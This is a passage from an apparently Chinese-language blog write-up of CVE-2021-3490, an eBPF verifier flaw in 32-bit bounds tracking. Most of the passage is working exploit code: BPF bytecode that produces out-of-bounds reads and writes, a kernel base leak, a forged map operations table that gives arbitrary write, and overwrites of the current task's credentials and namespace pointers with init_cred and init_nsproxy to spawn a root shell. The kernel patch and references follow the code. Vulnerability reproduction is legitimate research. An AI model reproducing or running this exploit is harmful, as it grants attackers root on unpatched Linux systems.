2BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1), // r6 = r6 >> 1 = 2 >> 1 = 1BPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = [expmap_fd] = bpf_map ptr2BPF_MOV64_IMM(BPF_REG_8, 0), // r8 = 0BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8), // *(uint64_t*)(fp - 8) = r8 = 0BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fpBPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 rightBPF_EXIT_INSN(), // exitBPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 = value_buf2 addrBPF_MOV64_REG(BPF_REG_8, BPF_REG_6),BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000),BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000),BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110), // r6 = r6 * 0x110 = 1 * 0x110 = 0x110BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // r7 = r7 - r6 = value_buf2 addr - 0x110BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_opsBPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18), // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_opsBPF_MOV64_REG(BPF_REG_2, BPF_REG_8), // r2 = r8 = array_map_opsBPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0), // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addrBPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20), // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addrBPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8), // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addrBPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1), // if arb_read addr == NULL goto pc+1BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40), // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10), // r8 = value_buf1[2] = fake_opsBPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4), // if arb_write flag == 0 goto pc+4BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // expmap's bpf_map_ops = r8 = fake_opsBPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK), // map_type = BPF_MAP_TYPE_STACKBPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1), // max_entries = -1BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0), // spin_lock_off = 0BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),BPF_MOV64_IMM(BPF_REG_0, 0),BPF_EXIT_INSN(),};#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };union bpf_attr attr = {.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,.insns = (uint64_t) &prog,.insn_cnt = sizeof(prog) / sizeof(prog[0]),.license = (uint64_t) "GPL",.log_level = 2,.log_buf = (uint64_t) bpf_log_buf,.log_size = BPF_LOG_SZ,
};void init() {setbuf(stdin, NULL);setbuf(stdout, NULL);setbuf(stderr, NULL);
}void trigger() {char buffer[64];write(sockets[0], buffer, sizeof(buffer));
}void prep() {value1 = (uint64_t*)calloc(0x2000, 1);value2 = (uint64_t*)calloc(0x2000, 1);prctl(PR_SET_NAME, "XiaozaYa");map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");prog_fd = bpf(BPF_PROG_LOAD, &attr);if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)perror("socketpair()"), err_exit("socketpair()");if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
// puts(bpf_log_buf);
}uint32_t arb_read_4_byte(uint64_t addr) {value1[0] = 0;value1[1] = addr - 0x58;value1[2] = 0;bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);trigger();return bpf_map_get_info_by_fd(expmap_fd);
}uint64_t arb_read(uint64_t addr) {uint64_t lo = arb_read_4_byte(addr);uint64_t hi = arb_read_4_byte(addr+4);return (hi << 32) | lo;
}void prep_arb_write() {uint64_t buf[0x200/8] = { 0 };value1[0] = 0;value1[1] = 0;value1[2] = map_addr+0x110+0x20;uint64_t fake_ops[] = {0x0,0x0,0x0,0x0,0xffffffff81376260,0xffffffff813789d0,0x0,0xffffffff81377290,0xffffffff81376430,0x0,0x0,0xffffffff81344740,0x0,0xffffffff813443b0,0x0,0xffffffff81376710,0xffffffff81377080,0xffffffff813764b0,0xffffffff81376430,0x0,0x0,0x0,0x0,0xffffffff81377a80,0x0,0xffffffff81376cd0,0xffffffff813784b0,0x0,0x0,0x0,0xffffffff81376350,0xffffffff813763b0,0xffffffff81376c00,0x0,0x0,0x0,0x0,0xffffffff81378450,0xffffffff82b0c920,0xffffffff849b6500,0xffffffff82b0d1a0};for (int i = 0; i < sizeof(fake_ops) / 8; i++) {if (fake_ops[i]) fake_ops[i] += koffset;}memcpy(value2, fake_ops, sizeof(fake_ops));bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);trigger();
}void arb_write_4_byte(uint64_t addr, uint32_t val) {value2[0] = val - 1;bpf_map_update_elem(expmap_fd, &key, value2, addr);
}void arb_write(uint64_t addr, uint64_t val) {arb_write_4_byte(addr, val&0xffffffff);arb_write_4_byte(addr+4, (val>>32)&0xffffffff);
}void leak() {uint64_t buf[0x2000/8] = { 0 };value1[0] = 0;value1[1] = 0;value1[2] = 0;bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);trigger();memset(buf, 0, sizeof(buf));bpf_map_lookup_elem(map_fd, &key, buf);
// binary_dump("LEAK DATA", buf, 0x100);if ((buf[3] & 0xffffffff00000fff) == (array_map_ops & 0xffffffff00000fff)) {koffset = buf[3] - array_map_ops;kbase = 0xffffffff81000000 + koffset;map_addr = buf[4] - 0xc0;hexx("koffset", koffset);hexx("kbase", kbase);hexx("map_addr", map_addr);}if (koffset == -1) err_exit("FAILED to leak kernel base");array_map_ops += koffset;init_cred += koffset;init_task += koffset;init_nsproxy += koffset;hexx("init_cred", init_cred);hexx("init_task", init_task);hexx("init_nsproxy", init_nsproxy);current_task = init_task;for (;;) {
// hexx("current_task", current_task);if (arb_read(current_task+0xae8) == tag) {break;}current_task = arb_read(current_task + 0x820) - 0x818;}hexx("current_task", current_task);}int main(int argc, char** argv, char** envp)
{init();prep();leak();prep_arb_write();arb_write_4_byte(current_task+0xad8, init_cred&0xffffffff);arb_write_4_byte(current_task+0xad8+2, (init_cred>>16)&0xffffffff);arb_write_4_byte(current_task+0xad0, init_cred&0xffffffff);arb_write_4_byte(current_task+0xad0+2, (init_cred>>16)&0xffffffff);arb_write_4_byte(current_task+0xb40, init_nsproxy&0xffffffff);arb_write_4_byte(current_task+0xb40+2, (init_nsproxy>>16)&0xffffffff);get_root_shell();puts("EXP NERVER END!");return 0;
}
效果如下:
漏洞修复
patch
如下:
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 757476c91c984..9352a1b7de2dd 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,s32 smin_val = src_reg->s32_min_value;u32 umax_val = src_reg->u32_max_value;- /* Assuming scalar64_min_max_and will be called so its safe
- * to skip updating register for known 32-bit case.
- */
- if (src_known && dst_known)
+ if (src_known && dst_known) {
+ __mark_reg32_known(dst_reg, var32_off.value);return;
+ }/* We get our minimum from the var_off, since that's inherently* bitwise. Our maximum is the minimum of the operands' maxima.
@@ -7108,7 +7107,6 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,dst_reg->s32_min_value = dst_reg->u32_min_value;dst_reg->s32_max_value = dst_reg->u32_max_value;}
-}*/static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{reg->var_off = tnum_const_subreg(reg->var_off, imm);reg->s32_min_value = (s32)imm;reg->s32_max_value = (s32)imm;reg->u32_min_value = (u32)imm;reg->u32_max_value = (u32)imm;
}
即在寄存器的低 32 位已知时,及时更新 32 位范围。
参考
【kernel exploit】CVE-2021-3490 eBPF 32位边界计算错误漏洞
【CVE.0x0A】CVE-2021-3490 漏洞复现及简要分析
这篇关于CVE-2021-3490:ebpf verifier 寄存器32位范围更新错误导致越界读写【ALU Sanitation 绕过】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!